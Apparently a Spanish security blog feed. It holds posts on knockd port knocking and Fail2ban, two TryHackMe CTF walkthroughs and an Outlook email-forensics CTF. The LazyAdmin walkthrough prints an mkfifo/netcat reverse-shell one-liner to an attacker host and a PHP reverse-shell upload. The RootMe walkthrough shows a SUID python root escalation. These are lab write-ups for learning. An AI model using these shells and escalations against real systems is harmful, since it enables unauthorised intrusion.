</span></span><span style="display:flex;"><span>        stop_command  <span style="color:#f92672">=</span> /bin/firewall-cmd --zone<span style="color:#f92672">=</span>public --remove-rich-rule <span style="color:#e6db74">&#34;rule family=&#34;</span>ipv4<span style="color:#e6db74">&#34; source address=&#34;</span>%IP%<span style="color:#e6db74">&#34; service name=&#34;</span>ssh<span style="color:#e6db74">&#34; accept&#34;</span>
</span></span></code></pre></div><p>El último paso es habilitar e iniciar el servicio knockd.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>sudo systemctl enable knockd <span style="color:#f92672">&amp;&amp;</span> sudo systemctl start knockd
</span></span></code></pre></div><h2 id="máquina-cliente">Máquina cliente</h2>
<p>En la máquina cliente desde la que vamos a acceder por SSH es necesario instalar el cliente de knock. Al igual que en el servidor es necesario disponer del repositorio EPEL.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>yum install epel-release
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>yum install knock
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span></code></pre></div><p>Vamos a una un primer intento de conexión mediante SSH para que veamos que no es posible conectar.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span><span style="color:#f92672">[</span>ignacio@knock-client ~<span style="color:#f92672">]</span>$ ssh root@192.168.122.186
</span></span><span style="display:flex;"><span>ssh: connect to host 192.168.122.186 port 22: No route to host
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>ignacio@knock-client ~<span style="color:#f92672">]</span>$  
</span></span></code></pre></div><p>Ahora vamos a usar el cliente de knock que hemos instalado para hacer la &ldquo;llamada&rdquo; y que se abra la puerta.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span><span style="color:#f92672">[</span>root@knock-client ~<span style="color:#f92672">]</span><span style="color:#75715e"># knock -v -d 1 192.168.122.186 51234:udp 55678:tcp 59124:udp</span>
</span></span><span style="display:flex;"><span>hitting udp 192.168.122.186:51234
</span></span><span style="display:flex;"><span>hitting tcp 192.168.122.186:55678
</span></span><span style="display:flex;"><span>hitting udp 192.168.122.186:59124
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>root@knock-client ~<span style="color:#f92672">]</span><span style="color:#75715e"># ssh root@192.168.122.186</span>
</span></span><span style="display:flex;"><span>root@192.168.122.186<span style="color:#960050;background-color:#1e0010">&#39;</span>s password:  
</span></span><span style="display:flex;"><span>Last failed login: Sun Aug  <span style="color:#ae81ff">1</span> 20:51:14 WEST <span style="color:#ae81ff">2021</span> from knock-client on ssh:notty
</span></span><span style="display:flex;"><span>Last login: Sun Aug  <span style="color:#ae81ff">1</span> 20:25:03 <span style="color:#ae81ff">2021</span> from knock-client
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>root@knockd ~<span style="color:#f92672">]</span><span style="color:#75715e"># </span>
</span></span></code></pre></div><p>En el fichero messages del servidor podemos ver lo siguiente:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>Aug  <span style="color:#ae81ff">1</span> 20:51:26 knock-client knockd: 192.168.122.136: opencloseSSH: Stage <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>Aug  <span style="color:#ae81ff">1</span> 20:51:26 knock-client knockd: 192.168.122.136: opencloseSSH: Stage <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>Aug  <span style="color:#ae81ff">1</span> 20:51:26 knock-client knockd: 192.168.122.136: opencloseSSH: Stage <span style="color:#ae81ff">3</span>
</span></span><span style="display:flex;"><span>Aug  <span style="color:#ae81ff">1</span> 20:51:26 knock-client knockd: 192.168.122.136: opencloseSSH: OPEN SESAME
</span></span><span style="display:flex;"><span>Aug  <span style="color:#ae81ff">1</span> 20:51:26 knock-client knockd: opencloseSSH: running command: /bin/firewall-cmd --zone<span style="color:#f92672">=</span>public --add-rich-rule <span style="color:#e6db74">&#34;rule family=&#34;</span>ipv4<span style="color:#e6db74">&#34; source address=&#34;</span>192.168.122.136<span style="color:#e6db74">&#34; service name=&#34;</span>ssh<span style="color:#e6db74">&#34; accept&#34;</span>
</span></span><span style="display:flex;"><span>Aug  <span style="color:#ae81ff">1</span> 20:51:31 knock-client systemd-logind: New session <span style="color:#ae81ff">4</span> of user root.
</span></span><span style="display:flex;"><span>Aug  <span style="color:#ae81ff">1</span> 20:51:31 knock-client systemd: Started Session <span style="color:#ae81ff">4</span> of user root.
</span></span><span style="display:flex;"><span>Aug  <span style="color:#ae81ff">1</span> 20:51:37 knock-client knockd: 192.168.122.136: opencloseSSH: command timeout
</span></span><span style="display:flex;"><span>Aug  <span style="color:#ae81ff">1</span> 20:51:37 knock-client knockd: opencloseSSH: running command: /bin/firewall-cmd --zone<span style="color:#f92672">=</span>public --remove-rich-rule <span style="color:#e6db74">&#34;rule family=&#34;</span>ipv4<span style="color:#e6db74">&#34; source address=&#34;</span>192.168.122.136<span style="color:#e6db74">&#34; service name=&#34;</span>ssh<span style="color:#e6db74">&#34; accept&#34;</span>
</span></span></code></pre></div>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Instalación de Fail2ban en un servidor CentOS</title>
      <link>https://www.igalvan.es/posts/esta-tarde-estaba-configurando-un/</link>
      <pubDate>Fri, 30 Jul 2021 20:49:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/esta-tarde-estaba-configurando-un/</guid>
      <description><![CDATA[<p>Esta tarde estaba configurando un servidor para un proyecto personal que he alquilado en un proveedor de estos baratillos y nada más instalar CentOS y conectarme por SSH, lo primero que me sale es un mensaje indicando que ha habido siete intentos de inicio de sesión incorrectos&hellip;</p>
<p>Hay que ver cómo está el patio, ¡la máquina encendida llevaba cinco minutos encendida! Así que después de cambiar en el servicio SSH que solo se pueda autenticar mediante claves, lo siguiente ha sido instalar Fail2ban.</p>
<h2 id="instalación-de-fail2ban-en-centos">Instalación de Fail2ban en CentOS</h2>
<p>El primer paso es instalar el repositorio EPEL, si no lo tiene hecho ya, claro.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>dnf install epel-repo
</span></span></code></pre></div><p>Después tenemos que instalar el paquete fail2ban.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>dnf install fail2ban
</span></span></code></pre></div><h2 id="configuración-de-fail2ban">Configuración de Fail2ban</h2>
<p>En mi caso, al menos por ahora, voy a dejar la configuración por defecto. En el fichero <code>/etc/fail2ban/jail.conf</code>, está toda la configuración por si queréis modificarla.</p>
<h2 id="creación-de-la-jaula-para-sshd">Creación de la jaula para SSHD</h2>
<p>Hay que crear el fichero que contendrá la configuración de la jaula para el servicio SSHD. Creamos el fichero <code>/etc/fail2ban/jail.d/sshd.local</code> y dentro ponemos el siguiente contenido:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span><span style="color:#f92672">[</span>sshd<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>enabled <span style="color:#f92672">=</span> true
</span></span></code></pre></div><h2 id="activación-del-servicio-fail2ban">Activación del servicio Fail2ban</h2>
<p>Una vez que hemos completado la configuración de Fail2ban, lo siguiente es activar el servicio para que empiece a vigilar por nosotros. 😉</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>systemctl enable --now fail2ban
</span></span><span style="display:flex;"><span>Created symlink /etc/systemd/system/multi-user.target.wants/fail2ban.service → /usr/lib/systemd/system/fail2ban.service.
</span></span></code></pre></div><h2 id="verificación-del-estado-del-servicio-fail2ban">Verificación del estado del servicio Fail2ban</h2>
<p>Verificamos que se ha iniciado correctamente con la jaula definida.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>fail2ban-client status
</span></span><span style="display:flex;"><span>Status
</span></span><span style="display:flex;"><span>|- Number of jail:    <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#e6db74">`</span>- Jail list:    sshd
</span></span></code></pre></div><h2 id="comprobamos-cómo-va-la-cosa">Comprobamos cómo va la cosa</h2>
<p>Dejamos pasar un par de minutos y vamos a ver cuántas IP bloqueadas tenemos.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>fail2ban-client get sshd banned
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span><span style="color:#e6db74">&#39;xxx.xxx.xxx.xxx&#39;</span>, <span style="color:#e6db74">&#39;xx.xx.xx.xxx&#39;</span>, <span style="color:#e6db74">&#39;xx.xx.xxx.xxx&#39;</span>, <span style="color:#e6db74">&#39;xxx.xxx.xxx.xxx&#39;</span>, <span style="color:#e6db74">&#39;xx.xx.xxx.xxx&#39;</span>, <span style="color:#e6db74">&#39;xxx.xxx.xxx.xxx&#39;</span>, <span style="color:#e6db74">&#39;xx.xxx.xxx.xxx&#39;</span>, <span style="color:#e6db74">&#39;xx.xxx.xxx.xx&#39;</span>, <span style="color:#e6db74">&#39;xxx.xxx.xx.xx&#39;</span>, <span style="color:#e6db74">&#39;xx.xx.xxx.xxx&#39;</span><span style="color:#f92672">]</span>
</span></span></code></pre></div>]]></description>
      
    </item>
    
    
    
    <item>
      <title>CFT - TryHackMe - LazyAdmin</title>
      <link>https://www.igalvan.es/posts/ctf-try-hack-me-lazy-admin/</link>
      <pubDate>Wed, 24 Feb 2021 17:00:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/ctf-try-hack-me-lazy-admin/</guid>
      <description><![CDATA[<p>Easy linux machine to practice your skills.</p>
<h1 id="lazy-admin">Lazy Admin</h1>
<p>El primer paso es hacer un poco de reconocimiento a ver qué nos encontramos.</p>
<h3 id="nmap">nmap</h3>
<pre tabindex="0"><code>root@kali:~# nmap -sS -p- --min-rate 500 --open -n -Pn 10.10.188.99
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-19 16:58 UTC
Nmap scan report for 10.10.188.99
Host is up (0.0071s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:3A:29:AF:90:F3 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 5.18 seconds
root@kali:~# 
root@kali:~# nmap -sV -p22 10.10.188.99
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-19 17:05 UTC
Nmap scan report for ip-10-10-188-99.eu-west-1.compute.internal (10.10.188.99)
Host is up (0.00021s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
MAC Address: 02:3A:29:AF:90:F3 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.38 seconds
root@kali:~# 
</code></pre><h3 id="whatweb">whatweb</h3>
<pre tabindex="0"><code>root@kali:~# whatweb http://10.10.188.99 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.188.99], Title[Apache2 Ubuntu Default Page: It works]
root@kali:~# 
</code></pre><h3 id="wfuzz">wfuzz</h3>
<pre tabindex="0"><code>root@kali:~# wfuzz -c -t 300 --hc=404 -w /usr/share/wordlists/wfuzz/general/big.txt http://10.10.188.99/FUZZ

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz&#39;s documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.188.99/FUZZ
Total requests: 3024

===================================================================
ID           Response   Lines    Word     Chars       Payload                                       
===================================================================

000000689:   301        9 L      28 W     314 Ch      &#34;content&#34;                           

Total time: 27.80658
Processed Requests: 3024
Filtered Requests: 3023
Requests/sec.: 108.7512

root@kali:~# 
</code></pre><h2 id="what-is-the-user-flag">What is the user flag?</h2>
<p>El primer paso es acceder a la web que publica el servidor a ver qué nos encontramos.</p>
<p><img src="/images/2021/20210224-lazyadmin-web.png" alt="image-20210223200011495"></p>
<p>En Exploit Database encontramos una <a href="https://www.exploit-db.com/exploits/40718">vulnerabilidad</a> que nos dice lo siguiente:</p>
<pre tabindex="0"><code>[...]
Proof of Concept :

You can access to all mysql backup and download them from this directory.
http://localhost/inc/mysql_backup
[...]
</code></pre><p>Accedemos a la ruta y nos encontramos un fichero SQL.</p>
<p><img src="/images/2021/20210224-lazyadmin-sqlfile.png" alt="image-20210223195856540"></p>
<p>Descargamos el fichero y revisándolo nos encontramos la siguiente línea:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">\\</span><span style="color:#e6db74">&#34;admin\\&#34;</span>;s:<span style="color:#ae81ff">7</span>:<span style="color:#960050;background-color:#1e0010">\\</span><span style="color:#e6db74">&#34;manager\\&#34;</span>;s:<span style="color:#ae81ff">6</span>:<span style="color:#960050;background-color:#1e0010">\\</span><span style="color:#e6db74">&#34;passwd\\&#34;</span>;s:<span style="color:#ae81ff">32</span>:<span style="color:#960050;background-color:#1e0010">\\</span><span style="color:#e6db74">&#34;42f749ade7f9e195bf475f37a44cafcb\\&#34;</span>
</span></span></code></pre></div><p>Parece que tenemos unas credenciales con un hash MD5 para la contraseña pero lo mejor es confirmarlo.</p>
<pre tabindex="0"><code>root@kali:~/Downloads# hash-identifier 
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /&#39;__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: 42f749ade7f9e195bf475f37a44cafcb

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
</code></pre><p>El siguiente paso será obtener una contraseña de ese hash. La herramienta a utilizar queda al buen entendimiento del lector.</p>
<p>De los datos del wfuzz sabemos que hay una carpeta &ldquo;/content&rdquo; y buscando un poco por en el <a href="https://github.com/sweetrice/SweetRice">código fuente en GitHub</a> puedes saber que este CMS tiene su web de administración en la carpeta &ldquo;as&rdquo;, por lo que la ruta a acceder es &ldquo;/content/as&rdquo;</p>
<p><img src="/images/2021/20210224-lazyadmin-sweetrice.png" alt="image-20210223201106410"></p>
<p>Lo divertido es saber dónde cargar el fichero PHP de la shell inversa. Aquí no queda otra que ir pinchando en las distintas opciones. Yo te ahorro el esfuerzo y te digo que hay que cargarlo desde &ldquo;Media Center&rdquo;.</p>
<p>Voy a usar Burp Suite para capturar la llamada POST y poder probar con distintas extensiones de ficheros PHP a ver cuál cuela.</p>
<p><img src="/images/2021/20210224-lazyadmin-post" alt="image-20210223201213742"></p>
<p><img src="/images/2021/20210224-lazyadmin-burp" alt="image-20210223201307163"></p>
<p>Preparo la sesión de netcat desde el equipo atacante</p>
<pre tabindex="0"><code>root@kali:~# netcat -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.34.182] from (UNKNOWN) [10.10.188.99] 47334
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 20:17:53 up  1:21,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can&#39;t access tty; job control turned off
$ whoami
www-data
$
</code></pre><p>Ya solo queda ir a por la bandera de usuario.</p>
<pre tabindex="0"><code>$ cd /home
$ ls
itguy
$ cd itguy
$ ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
backup.pl
examples.desktop
mysql_login.txt
user.txt
$ cat user.txt
{ESTO_NO_TE_LO_PONGO}
$ 
</code></pre><h2 id="what-is-the-root-flag">What is the root flag?</h2>
<p>El primer paso es intentar escalar privilegios. Vamos a estabilizar la sesión de shell mediante este comando.</p>
<pre tabindex="0"><code>python -c &#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;
</code></pre><p>Ahora ya podemos probar a ver si este usuario puede realizar alguna tarea como root mediante sudo.</p>
<pre tabindex="0"><code>$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
</code></pre><p>Hay un script de Perl que podemos ejecutar pero que no podemos modificar. Vamos a ver si podemos saber qué hace este script.</p>
<pre tabindex="0"><code>$ cat backup.pl
#!/usr/bin/perl

system(&#34;sh&#34;, &#34;/etc/copy.sh&#34;);
</code></pre><p>Ejecuta un fichero llamado &ldquo;copy.sh&rdquo; que sí que podemos modificar. Vamos a cambiar su contenido por una shell inversa al equipo atacante.</p>
<pre tabindex="0"><code>$ echo &#39;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.34.182 5554 &gt;/tmp/f&#39; &gt; /etc/copy.sh
$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.34.182 5554 &gt;/tmp/f
</code></pre><p>Ejecutamos el script.</p>
<pre tabindex="0"><code>$ sudo /usr/bin/perl /home/itguy/backup.pl
</code></pre><p>Ya solo queda obtener la bandera.</p>
<pre tabindex="0"><code># cd /root
# ls
root.txt
# cat root.txt
{ESTO_NO_TE_LO_PONGO}
</code></pre>]]></description>
      
    </item>
    
    
    
    <item>
      <title>CFT - TryHackMe - RootMe</title>
      <link>https://www.igalvan.es/posts/ctf-try-hack-me-root-me/</link>
      <pubDate>Tue, 23 Feb 2021 19:10:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/ctf-try-hack-me-root-me/</guid>
      <description><![CDATA[<p>A ctf for beginners, can you root me?</p>
<h1 id="deploy-the-machine">Deploy the machine</h1>
<p>Bueno esto no tiene mucho misterio, es darle al botón de despliegue y esperar a que arranque.</p>
<h1 id="reconnaissance">Reconnaissance</h1>
<p>First, let&rsquo;s get information about the target.</p>
<h2 id="scan-the-machine-how-many-ports-are-open-what-service-is-running-on-port-22">Scan the machine, how many ports are open? What service is running on port 22?</h2>
<pre tabindex="0"><code>root@kali:~# nmap -sS --min-rate 500 -p- --open -n -Pn 10.10.69.166
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-20 17:10 UTC
Nmap scan report for 10.10.69.166
Host is up (0.0011s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:56:12:EA:16:0D (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 2.97 seconds
root@kali:~# 
</code></pre><h2 id="what-version-of-apache-is-running">What version of Apache is running?</h2>
<pre tabindex="0"><code>root@kali:~# whatweb 10.10.69.166
http://10.10.69.166 [200 OK] Apache[2.4.29], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.10.69.166], Script, Title[HackIT - Home]
root@kali:~# 
</code></pre><h2 id="find-directories-on-the-web-server-using-the-gobuster-tool">Find directories on the web server using the GoBuster tool.</h2>
<p>Yo uso wfuzz. Lo siento, me resulta más comoda esta herramienta.</p>
<pre tabindex="0"><code>root@kali:~# wfuzz -c -t 300 --hc=404 -w /usr/share/wordlists/wfuzz/general/big.txt http://10.10.69.166/FUZZ

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.69.166/FUZZ
Total requests: 3024

===================================================================
ID           Response   Lines    Word     Chars       Payload                             
===================================================================

000000740:   301        9 L      28 W     310 Ch      &#34;css&#34;                               
000001474:   301        9 L      28 W     309 Ch      &#34;js&#34;                               
000001988:   301        9 L      28 W     312 Ch      &#34;panel&#34;                             

Total time: 28.25782
Processed Requests: 3024
Filtered Requests: 3021
Requests/sec.: 107.0146
</code></pre><h2 id="what-is-the-hidden-directory">What is the hidden directory?</h2>
<p>Tras revisar los resultados del comando anterior es fácil concluir que la respuesta es /panel/.</p>
<h1 id="getting-a-shell">Getting a shell</h1>
<h2 id="find-a-form-to-upload-and-get-a-reverse-shell-and-find-the-flag">Find a form to upload and get a reverse shell, and find the flag.</h2>
<p>He optado por la shell inversa de <a href="https://github.com/pentestmonkey/php-reverse-shell">Pentestmonkey</a>. Hay que editar el fichero y cambiar la IP a la de nuestro equipo atacante y, si se desea, cambiar el puerto.</p>
<p><img src="/images/2021/20210223-rootme-uploads.png" alt="image-20210223190717386"></p>
<p>Al mismo tiempo preparo una sesión de netcat en el equipo atacante para recibir la conexión de la shell inversa.</p>
<pre tabindex="0"><code>root@kali:~# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.82.225] from (UNKNOWN) [10.10.69.166] 39068
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 17:23:36 up 15 min,  0 users,  load average: 0.00, 0.06, 0.14
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can&#39;t access tty; job control turned off
$ 
</code></pre><h2 id="usertxt">user.txt</h2>
<pre tabindex="0"><code>$ ls
html
user.txt
$ cat user.txt
{ESTO_NO_TE_LO_PONGO}
$ 
</code></pre><h1 id="privilege-escalation">Privilege escalation</h1>
<p>Now that we have a shell, let&rsquo;s escalate our privileges to root.</p>
<h2 id="search-for-files-with-suid-permission-which-file-is-weird">Search for files with SUID permission, which file is weird?</h2>
<p>Hago una búsqueda ejecutables con SUID y entre los resultados destaca el ejecutable de Python.</p>
<pre tabindex="0"><code>$ find / -perm -u=s -type f 2&gt;/dev/null
[...]
/usr/bin/python
[...]
</code></pre><h2 id="find-a-form-to-escalate-your-privileges">Find a form to escalate your privileges.</h2>
<p>Busco la forma de explotar el binario de Python en la web <a href="https://gtfobins.github.io/">GTFOBins</a> y ejecuto lo siguiente.</p>
<pre tabindex="0"><code>$ python -c &#39;import os; os.execl(&#34;/bin/sh&#34;, &#34;sh&#34;, &#34;-p&#34;)&#39;
whoami
root
</code></pre><h2 id="roottxt">root.txt</h2>
<pre tabindex="0"><code>cd /root
ls
root.txt
cat root.txt
{ESTO_NO_TE_LO_PONGO}
</code></pre>]]></description>
      
    </item>
    
    
    
    <item>
      <title>CTF- Metaspike - Space invaders (Parte 4)</title>
      <link>https://www.igalvan.es/posts/cft-space-invaders-parte-4/</link>
      <pubDate>Sat, 02 Jan 2021 12:00:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/cft-space-invaders-parte-4/</guid>
      <description><![CDATA[<p>Cuarta y última parte del CTF &ldquo;Space Invaders&rdquo;.</p>
<p>El enunciado de esta cuarta parte nos dice lo siguiente:</p>
<blockquote>
<p>Based on the information available to you, what is the maximum amount of time Vivian Alyse could have spent composing the final message in the thread that you examined? That is, time elapsed from the moment she pressed the &ldquo;Reply&rdquo; or &ldquo;Forward&rdquo; button, to the moment she hit &ldquo;Send&rdquo;. Assume that the following is true:</p>
<pre><code>Vivian used Outlook to compose and send the message
All of the computers involved in the email conversation keep perfectly accurate time
</code></pre>
<p>Enter the duration in minutes rounding up. For example, enter 46 for 45 minutes and 31 seconds.</p>
</blockquote>
<p>Este es bastante fácil. Si lo retomamos dónde lo dejamos en el artículo anterior, en la propiedad <code>PR_CONVERSATION_INDEX</code> tenemos unos valores llamados <code>TimeDelta</code> y de estos nos interesa el segundo que es la última respuesta a este correo.</p>
<p>![captura timedelta pr_conversation_index]({{ site.url }}/assets/timedelta_cft_space_invaders.png)</p>
<p>El valor <code>0x00000AE9</code> lo tenemos que convertir a decimal y posteriormente a minutos quedando que son 1 minuto y 47 segundos, que redondeando hacia arriba como nos pide el enunciado nos queda el valor de <strong>2 minutos</strong>. :checkered_flag:</p>
<p>Y con esto ya hemos terminado este reto. :tada:</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>CTF- Metaspike - Space invaders (Parte 3)</title>
      <link>https://www.igalvan.es/posts/cft-space-invaders-parte-3/</link>
      <pubDate>Fri, 01 Jan 2021 12:00:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/cft-space-invaders-parte-3/</guid>
      <description><![CDATA[<p>Tercera parte del CTF &ldquo;Space Invaders&rdquo;. Desgraciadamente no he podido continuar usando el script en PHP para resolver esta parte porque no he sido capaz de obtener el valor que necesito dentro de la estructura de datos, así que en este caso he utilizado Outlook 2016 con el software OutlookSpy (<a href="http://www.dimastr.com/outspy/home.htm)">http://www.dimastr.com/outspy/home.htm)</a>.</p>
<p>El enunciado de esta tercera parte nos dice lo siguiente:</p>
<blockquote>
<p>It is believed that the email you examined in Part 1 and Part 2 of this challenge was the last message in a conversation thread that comprises multiple messages. Based on the information available to you, when was the initial message in this conversation thread likely sent?</p>
<p>Enter the timestamp in UTC in the following format: yyyy-mm-dd hh:mm:ss (e.g., 2005-11-20 13:17:48)</p>
</blockquote>
<p>Una vez que abrimos el mensaje en Outlook y hacemos clic sobre el botón &ldquo;iMessage&rdquo; veremos toda la información interna del fichero incluyendo sus propiedades MAPI. La propiedad que debemos buscar es <code>PR_CONVERSATION_INDEX</code>. Dentro de esta propiedad lo que nos interesa es el campo <code>Value</code> que contiene una cadena hexadecimal de 32 bytes que tenemos que descomponer.</p>
<p>![captura pr_conversation_index]({{ site.url }}/assets/filetime_cft_space_invaders.png)</p>
<p>De toda esta estructura lo que nos interesa son los primeros doce caracteres a los que debemos añadir cuatro ceros (0000) en la parte posterior quedando el valor <code>01D5D17A24E40000</code> y así completar la longitud de 32 bits.</p>
<p>Si os estáis preguntando qué representa este valor pues os cuento que es el número de nanosegundos que han pasado desde el 1 de enero de 1601 que es lo que se conoce como unidades FILETIME (<a href="https://docs.microsoft.com/es-es/office/client-developer/outlook/mapi/filetime)">https://docs.microsoft.com/es-es/office/client-developer/outlook/mapi/filetime)</a>.</p>
<p>Lo más rápido para convertir esto a una fecha &ldquo;humana&rdquo; es utilizar un conversor de FILETIME como el de la página <a href="https://www.epochconverter.com/ldap">https://www.epochconverter.com/ldap</a>. Tras convertirlo nos queda la fecha 22 de enero de 2020 a las 23:17:41 que es la respuesta que buscamos. Tan solo queda formatearlo tal y como se nos indica, con lo que <strong>la respuesta final es 2020-01-22 23:17:41</strong>.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>CTF- Metaspike - Space invaders (Parte 2)</title>
      <link>https://www.igalvan.es/posts/cft-space-invaders-parte-2/</link>
      <pubDate>Wed, 30 Dec 2020 16:15:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/cft-space-invaders-parte-2/</guid>
      <description><![CDATA[<p>Segunda parte del CTF &ldquo;Space Invaders&rdquo;. Ya os avanzo que este va a ser muy corto ya que prácticamente he respondido a esta pregunta en el script de la primera.</p>
<p>El enunciado de esta segunda parte nos dice lo siguiente:</p>
<blockquote>
